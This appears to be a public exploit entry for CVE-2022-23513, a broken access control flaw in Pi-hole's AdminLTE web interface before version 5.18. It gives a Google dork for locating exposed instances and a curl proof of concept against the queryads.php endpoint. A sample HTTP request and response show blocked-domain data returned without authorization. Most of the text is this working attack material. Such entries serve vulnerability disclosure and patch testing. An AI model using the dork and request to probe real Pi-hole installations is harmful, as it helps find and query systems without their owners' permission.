# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554) # Date: 21.12.2022 # Exploit Author: kv1to # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17 # Tested on: Raspbian / Debian # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497 # CVE : CVE-2022-23513 In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint. ## Proof Of Concept with curl: curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' ## HTTP requests GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1 HOST: pi.hole Cookie: [..SNIPPED..] [..SNIPPED..] ## HTTP Response HTTP/1.1 200 OK [..SNIPPED..] data: Match found in [..SNIPPED..] data: <domain> data: <domain> data: <domain>